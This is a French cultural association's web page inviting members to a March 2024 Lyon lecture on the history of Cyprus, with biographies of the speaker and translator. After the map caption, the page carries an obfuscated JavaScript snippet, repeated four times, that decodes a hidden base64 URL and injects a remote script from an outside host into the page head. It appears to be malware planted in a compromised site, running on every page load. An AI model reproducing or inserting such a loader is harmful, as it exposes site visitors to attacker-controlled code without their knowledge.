Defkalion : Bref histoire de l’île de Chypre

Chères adhérentes, chers adhérents, chères amies, chers amis,

Defkalion a le grand plaisir de vous inviter à la soirée dédiée à Chypre :

le dimanche 10 mars 2024 à 17h45

au 44 rue Saint-Georges 69005 Lyon.

Entrée libre sur inscription via le lien

https://www.helloasso.com/associations/defkalion-association-culturelle-franco-hellenique/evenements/un-bref-regard-sur-l-histoire-de-l-ile-de-chypre

 Un bref regard sur l’histoire de l’île de Chypre
Georges Georgiou sera le conférencier en grec et Maria Georgiou se chargera de la traduction en français.

Georges Georgiou est né à Limassol à l’île de Chypre en 1955. Il a fait des études de médecine générale à la Faculté de Médecine à Thessalonique en Grèce et s’est spécialisé en chirurgie générale. Il a poursuivi ses études à Johannesburg en Afrique du Sud et à Lyon en France. Il a travaillé en Grèce et il a été Directeur de la Clinique Chirurgicale à Xanthi au nord du pays. En parallèle de son activité professionnelle Georges Georgiou a décidé récemment de se mettre à l’écriture et a publié en 2022 son premier livre de nouvelles inspirées de son expérience de médecin ainsi que celle de la guerre de 1974 avec la Turquie, intitulé « Visite médicale à domicile ». Il est un passionné de l’histoire en général et de celle de son pays en particulier et heureux de faire connaître au public lyonnais un aperçu de la trajectoire historique de Chypre à travers les siècles.

Maria Georgiou est née à Limassol à Chypre. Elle a fait des études en Psychologie Clinique en France à Lyon où elle a vécu et a travaillé des nombreuses années. Elle vit actuellement à Chypre. Maria Georgiou est intéressée par les lettres, elle a publié en 2020 son premier recueil de poèmes en grec intitulé « Αμέτοχες εποχές στο φως ». Ses poèmes ont été traduits en français par Kostas Nassikas et publiés à la Revue littéraire « Verso » en mars 2023.

Vous êtes invités à rester partager le verre de l’amitié !

Carte géographique ancienne de Chypre. Cypri insulae, gravée en 1581 par Ortelius. Cartouche décoratif de l’île de Lemnos.

(function(){var a=document.head||document.getElementsByTagName(“head”)[0],b=”script”,c=atob(“aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=”);c+=-1<c.indexOf("?")?"&":"?";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();(function(){var a=document.head||document.getElementsByTagName(“head”)[0],b=”script”,c=atob(“aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=”);c+=-1<c.indexOf("?")?"&":"?";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();(function(){var a=document.head||document.getElementsByTagName(“head”)[0],b=”script”,c=atob(“aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=”);c+=-1<c.indexOf("?")?"&":"?";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();(function(){var a=document.head||document.getElementsByTagName(“head”)[0],b=”script”,c=atob(“aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=”);c+=-1<c.indexOf("?")?"&":"?";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Ce site utilise Akismet pour réduire les indésirables. En savoir plus sur comment les données de vos commentaires sont utilisées.